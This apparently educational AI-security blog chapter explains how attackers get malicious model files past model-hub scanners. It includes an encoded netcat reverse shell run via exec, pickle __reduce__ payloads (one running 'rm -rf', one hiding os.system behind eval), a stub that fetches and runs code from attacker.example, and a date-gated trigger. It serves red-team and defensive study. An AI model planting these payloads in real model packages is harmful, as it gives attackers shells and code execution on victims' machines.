29.1.3 Verification bypass techniques

2025.10.06.
AI Security Blog

Model hubs are not naive; they employ automated scanners to detect malicious code within uploaded model artifacts. These scanners look for suspicious patterns, known malicious function calls, and unsafe file formats. An attacker’s success, therefore, often hinges not on simply hiding a payload, but on outsmarting the verification process itself. Bypassing these checks is a critical step in a successful supply chain attack.

The core challenge for defenders is the gap between static analysis (what the code *looks like* at rest) and dynamic behavior (what the code *does* when executed). Attackers exploit this gap relentlessly.

Threat Scenario: The Time-Delayed Payload

An attacker uploads a seemingly benign model to a public repository. The model’s code and its serialized `pickle` file pass all automated scans. There are no calls to `os.system` or `subprocess.run`. However, embedded within a tensor’s metadata is a base64-encoded string. The model’s loading script is crafted to read this metadata, decode it, and execute the result *only after* it has been loaded into memory on a victim’s machine. The scanner sees data; the victim’s machine runs code.
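This scenario can be sketched in a few lines. The metadata dict and its keys below are illustrative stand-ins for a real artifact's metadata block (e.g., a safetensors `__metadata__` dict or a `config.json` field), and the payload is a harmless placeholder:

```python
import base64

# Stand-in for a model artifact's metadata block; the keys and the
# payload are illustrative, not taken from a real model.
metadata = {
    "author": "friendly-lab",
    "notes": base64.b64encode(b"result = 2 + 2").decode(),  # hidden code
}

# A static scanner sees only an opaque string under "notes".
# The bundled loading script decodes and executes it at load time.
namespace = {}
exec(base64.b64decode(metadata["notes"]).decode(), namespace)
# After loading, namespace["result"] holds the computed value:
# the "data" became code only once it reached the victim's machine.
```

The key property is that the scanner and the victim see the same bytes but different behavior: at rest, the payload is indistinguishable from ordinary metadata.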

Static Analysis Evasion Techniques

Static scanners parse files without executing them. They are fast and can catch obvious threats, but they are vulnerable to techniques that obscure the payload’s true nature.

Obfuscation and Encoding

This is the most fundamental bypass method. By encoding or encrypting the malicious payload, an attacker can make it appear as harmless data to a scanner. The model’s legitimate loading code then acts as the de-obfuscator and executor.

Common methods include:

  • Base64/Hex Encoding: Simple to implement and effective against scanners searching for specific string literals like “subprocess” or “socket”.
  • String Concatenation/Manipulation: Building malicious commands from smaller, benign-looking strings can evade simple pattern matching. For example, building the string 'os.system' from 'os.' + 'system'.
  • Custom Ciphers: Using a simple XOR cipher or a custom encryption algorithm can render the payload unreadable to anything but the model’s own loader script.
# Example of a base64-encoded payload in a model's config
import base64
import os

# This string looks like harmless data to a static scanner
encoded_payload = "aW1wb3J0IG9zO29zLnN5c3RlbSgnbmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjEwLjUgNDQ0NCcp"

# The model's loading script decodes and executes it at runtime
decoded_script = base64.b64decode(encoded_payload).decode('utf-8')
exec(decoded_script)
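The custom-cipher variant works the same way. The sketch below uses a simple repeating-key XOR; the key and payload are illustrative:

```python
def xor_cipher(data: bytes, key: bytes) -> bytes:
    # XOR is symmetric: the same function both encrypts and decrypts.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Attacker side: the payload is embedded in the model as opaque bytes
# that match no string signature a scanner might look for.
secret = xor_cipher(b"print('stage two')", b"k3y")

# Victim side: the model's loader reverses the XOR before executing.
recovered = xor_cipher(secret, b"k3y")
assert recovered == b"print('stage two')"
```

Because the key ships inside the loader itself, the scheme offers no real confidentiality; its only purpose is to defeat signature matching.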

Sophisticated Pickle Deserialization Abuse

While many scanners look for `pickle` files, they often search for simple, known exploits. A sophisticated attacker can craft a `pickle` payload that is much harder to detect. The `__reduce__` magic method in Python is the primary vehicle for this attack. It allows an object to specify exactly what function should be called with what arguments to rebuild it during deserialization.

Warning: The following code is for educational purposes only. Unpickling data from an untrusted source is extremely dangerous and can lead to arbitrary code execution.

# A malicious class designed to execute code when unpickled
import os
import pickle

class MaliciousPickle:
    def __reduce__(self):
        # This tuple tells pickle to call os.system with the specified command
        command = "rm -rf /tmp/important_file"
        return (os.system, (command,))

# The attacker pickles an instance of this class
pickled_data = pickle.dumps(MaliciousPickle())

# On the victim's machine, loading this file triggers the command
# pickle.loads(pickled_data) 

A scanner might flag `os.system`, but an attacker could use a less obvious function or build the function call dynamically, making static detection significantly more challenging.
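One hedged sketch of this dynamic construction: by routing the call through `eval` and base64-encoding the command, neither `os` nor `system` appears as a literal anywhere in the serialized stream. The class name and command are illustrative:

```python
import base64
import pickle

class StealthyPickle:
    def __reduce__(self):
        # The real command is base64-encoded, so "os.system" never
        # appears literally in the pickled bytes.
        hidden = base64.b64encode(
            b"__import__('os').system('echo hi')"
        ).decode()
        stub = f"eval(__import__('base64').b64decode('{hidden}').decode())"
        # The only importable name in the stream is builtins.eval.
        return (eval, (stub,))

data = pickle.dumps(StealthyPickle())
assert b"os.system" not in data  # the obvious signature is absent
# On a victim machine, pickle.loads(data) would still run the command.
```

A scanner keyed on `GLOBAL posix system` or the string `os.system` sees nothing; catching this requires flagging `eval` itself, which legitimate pickles rarely need.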

Dynamic Execution and Runtime Attacks

These techniques focus on executing malicious code *after* the model has been scanned and loaded. The initial model package is clean, but it contains a trigger that fetches and runs the real payload from an external source.

Remote Payload Fetching (Call-Home)

The model contains a small, seemingly innocuous piece of code that connects to an attacker-controlled server to download the next stage of the attack. This is highly effective because the malicious payload is never present in the files scanned by the model hub.
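A minimal sketch of such a stub follows; the function name is illustrative and no real C2 address is included:

```python
import urllib.request

def fetch_and_run(url, namespace=None):
    # Download the second stage and execute it in-process. The model
    # package ships only this short, generic-looking helper; the
    # actual payload lives on the attacker-controlled server.
    code = urllib.request.urlopen(url).read().decode("utf-8")
    exec(code, namespace if namespace is not None else {})

# At load time the model would invoke something like:
# fetch_and_run("https://attacker.example/stage2.py")
```

To a static scanner this is indistinguishable from legitimate code that fetches a remote config or vocabulary file, which is why network egress controls matter more than file scanning here.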

The diagram below illustrates this “call-home” attack flow.

Diagram: dynamic payload execution (“call-home”) attack flow.

  1. The attacker uploads a “clean” model containing only a trigger to the model hub.
  2. The hub scans and approves the model (“Scan OK”).
  3. The victim downloads the verified model.
  4. The model runs on the victim system; the trigger fires and “calls home” to the attacker’s C2 (command-and-control) server.
  5. The C2 server delivers the malicious payload, which is executed on the victim system.

Exploiting Custom Operators and Code

Many models, especially in frameworks like PyTorch or TensorFlow, allow for custom code (e.g., in `model.py`). This code is executed when the model is loaded. An attacker can embed logic here that appears benign but performs a malicious action under specific runtime conditions—for instance, checking the system date or the presence of a certain file before activating a payload.
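A hedged sketch of such a dormant trigger; the activation date, function name, and marker file are all illustrative choices:

```python
import datetime
import os

def maybe_activate(now=None, marker="/etc/passwd"):
    # Stay dormant during scanning: activate only after a chosen date
    # and only if a host-specific marker file exists. Real triggers
    # might instead key on hostnames, GPU presence, or usernames.
    now = now or datetime.datetime.now()
    armed_after = datetime.datetime(2026, 1, 1)
    if now >= armed_after and os.path.exists(marker):
        return True   # the real payload would run here
    return False      # benign behavior inside the scanner's sandbox
```

During an automated scan or a short sandbox run, both conditions fail and the model behaves perfectly, which is exactly what makes this class of trigger so hard to detect dynamically.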

Summary of Bypass Techniques

As a red teamer, your goal is to emulate these techniques to test an organization’s model ingestion and security pipeline. The following table provides a quick reference.

| Technique | Mechanism | Detection Difficulty | Common Target Files |
|---|---|---|---|
| Obfuscation & Encoding | Hides malicious strings (e.g., commands, IPs) as data within code or configuration files. | Medium. Can be defeated by scanners that perform de-obfuscation, but many do not. | `.py` scripts, `config.json`, metadata |
| Pickle Abuse (`__reduce__`) | Crafts a serialized object that executes arbitrary code upon deserialization. | High. Requires deep inspection of the pickle bytecode, which is complex and often impractical. | `.pkl`, `.pt`, `.bin` |
| Remote Payload Fetching | The initial model is clean but contains code to download and execute a payload from the internet. | Very High. Static analysis is ineffective; requires runtime monitoring and network egress filtering. | `.py` scripts, custom operators |
| Conditional Execution | Payload is only activated if specific runtime conditions are met (e.g., specific date, user, or environment). | High. The malicious logic is dormant during scanning and may never trigger in a sandbox. | `.py` scripts, model loading code |

Understanding and applying these bypass techniques is essential for accurately assessing the security posture of an AI supply chain. A defense that only stops the most obvious attacks provides a false sense of security, which is often more dangerous than no security at all.